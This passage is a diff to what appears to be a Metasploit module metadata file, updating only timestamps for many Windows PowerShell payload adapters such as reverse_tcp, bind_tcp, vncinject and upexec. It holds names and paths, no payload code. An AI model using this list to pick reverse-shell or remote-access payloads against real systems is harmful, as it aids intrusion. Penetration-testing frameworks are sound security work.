     "ref_name": "cmd/windows/powershell/peinject/reverse_ord_tcp",
@@ -175075,7 +175236,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/reverse_tcp",
@@ -175113,7 +175274,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_allports",
@@ -175152,7 +175313,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_dns",
@@ -175192,7 +175353,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4",
@@ -175232,7 +175393,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_rc4_dns",
@@ -175269,7 +175430,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/peinject/reverse_tcp_uuid",
@@ -175304,7 +175465,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/pingback_bind_tcp",
@@ -175339,7 +175500,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/pingback_reverse_tcp",
@@ -175377,7 +175538,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/powershell_bind_tcp",
@@ -175415,7 +175576,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/powershell_reverse_tcp",
@@ -175453,7 +175614,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/powershell_reverse_tcp_ssl",
@@ -175492,7 +175653,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/bind_hidden_ipknock_tcp",
@@ -175531,7 +175692,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/bind_hidden_tcp",
@@ -175569,7 +175730,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp",
@@ -175608,7 +175769,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/bind_ipv6_tcp_uuid",
@@ -175645,7 +175806,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/bind_named_pipe",
@@ -175682,7 +175843,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/bind_nonx_tcp",
@@ -175720,7 +175881,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/bind_tcp",
@@ -175760,7 +175921,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/bind_tcp_rc4",
@@ -175798,7 +175959,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/bind_tcp_uuid",
@@ -175835,7 +175996,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/find_tag",
@@ -175873,7 +176034,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/reverse_ipv6_tcp",
@@ -175910,7 +176071,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/reverse_nonx_tcp",
@@ -175946,7 +176107,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/reverse_ord_tcp",
@@ -175984,7 +176145,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/reverse_tcp",
@@ -176022,7 +176183,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/reverse_tcp_allports",
@@ -176061,7 +176222,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/reverse_tcp_dns",
@@ -176101,7 +176262,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4",
@@ -176141,7 +176302,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/reverse_tcp_rc4_dns",
@@ -176179,7 +176340,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/reverse_tcp_uuid",
@@ -176216,7 +176377,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell/reverse_udp",
@@ -176252,7 +176413,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell_bind_tcp",
@@ -176287,7 +176448,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell_bind_tcp_xpfw",
@@ -176324,7 +176485,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell_hidden_bind_tcp",
@@ -176360,7 +176521,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/shell_reverse_tcp",
@@ -176395,7 +176556,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/speak_pwned",
@@ -176434,7 +176595,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/bind_hidden_ipknock_tcp",
@@ -176473,7 +176634,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/bind_hidden_tcp",
@@ -176511,7 +176672,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp",
@@ -176550,7 +176711,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/bind_ipv6_tcp_uuid",
@@ -176587,7 +176748,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/bind_named_pipe",
@@ -176623,7 +176784,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/bind_nonx_tcp",
@@ -176661,7 +176822,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/bind_tcp",
@@ -176701,7 +176862,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/bind_tcp_rc4",
@@ -176739,7 +176900,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/bind_tcp_uuid",
@@ -176776,7 +176937,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/find_tag",
@@ -176814,7 +176975,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/reverse_ipv6_tcp",
@@ -176850,7 +177011,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/reverse_nonx_tcp",
@@ -176887,7 +177048,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/reverse_ord_tcp",
@@ -176925,7 +177086,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/reverse_tcp",
@@ -176963,7 +177124,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_allports",
@@ -177002,7 +177163,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_dns",
@@ -177042,7 +177203,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4",
@@ -177082,7 +177243,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_rc4_dns",
@@ -177120,7 +177281,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/reverse_tcp_uuid",
@@ -177157,7 +177318,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/upexec/reverse_udp",
@@ -177196,7 +177357,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp",
@@ -177235,7 +177396,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/bind_hidden_tcp",
@@ -177273,7 +177434,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp",
@@ -177312,7 +177473,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid",
@@ -177349,7 +177510,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/bind_named_pipe",
@@ -177386,7 +177547,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/bind_nonx_tcp",
@@ -177424,7 +177585,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/bind_tcp",
@@ -177464,7 +177625,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/bind_tcp_rc4",
@@ -177502,7 +177663,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/bind_tcp_uuid",
@@ -177539,7 +177700,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/find_tag",
@@ -177578,7 +177739,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/reverse_hop_http",
@@ -177615,7 +177776,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/reverse_http",
@@ -177652,7 +177813,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/reverse_http_proxy_pstore",
@@ -177690,7 +177851,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/reverse_ipv6_tcp",
@@ -177727,7 +177888,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/reverse_nonx_tcp",
@@ -177764,7 +177925,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/reverse_ord_tcp",
@@ -177802,7 +177963,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp",
@@ -177840,7 +178001,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_allports",
@@ -177879,7 +178040,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_dns",
@@ -177919,7 +178080,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4",
@@ -177959,7 +178120,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns",
@@ -177997,7 +178158,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_uuid",
@@ -178035,7 +178196,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/vncinject/reverse_winhttp",
@@ -178071,7 +178232,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/encrypted_shell/reverse_tcp",
@@ -178106,7 +178267,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
     "ref_name": "cmd/windows/powershell/x64/exec",
@@ -178142,7 +178303,7 @@
     "autofilter_ports": null,
     "autofilter_services": null,
     "targets": null,
-    "mod_time": "2022-05-17 09:28:07 +0000",
+    "mod_time": "2022-05-27 16:41:25 +0000",
     "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
     "is_install_path": true,
